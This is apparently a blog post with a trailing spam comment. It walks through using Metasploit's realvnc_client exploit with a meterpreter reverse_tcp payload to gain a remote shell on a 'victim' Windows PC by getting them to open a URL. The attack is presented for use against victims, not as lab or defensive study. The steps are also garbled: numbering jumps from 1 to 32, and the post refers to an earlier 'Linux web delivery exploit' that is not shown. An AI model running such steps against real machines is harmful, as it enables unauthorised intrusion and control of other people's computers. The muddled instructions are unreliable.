VNC is a great protocol that you can use on Windows and Linux machines to remotely control computers. This is useful if you need to control your computer when away from home, or help a client with a disk cleanup. VNC is secure in the sense that it requires authentication in order to make the connection.
Step 1. Open MetaSploit with msfconsole command
Step 32. Use Below Commands :-
use exploit/windows/vnc/realvnc_client
set payload windows/meterpreter/reverse_tcp
Next, we need to set the LHOST and LPORT exactly like we did with the Linux web delivery exploit. And type run. Now an URL you should give to your victim.
Step 3. Open the Kali Linux ip on victim PC (Window PC/target PC) in browser
Step 4. When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)
A meterpreter session open!
fila
I enjoy you because of all your hard work on this website. My mum delights in making time for investigations and it's easy to see why. My partner and i know all concerning the powerful method you convey effective information via your web site and even recommend contribution from people on the area of interest and our own girl is now understanding a lot of things. Enjoy the remaining portion of the year. You are conducting a splendid job.
14-Sep-2019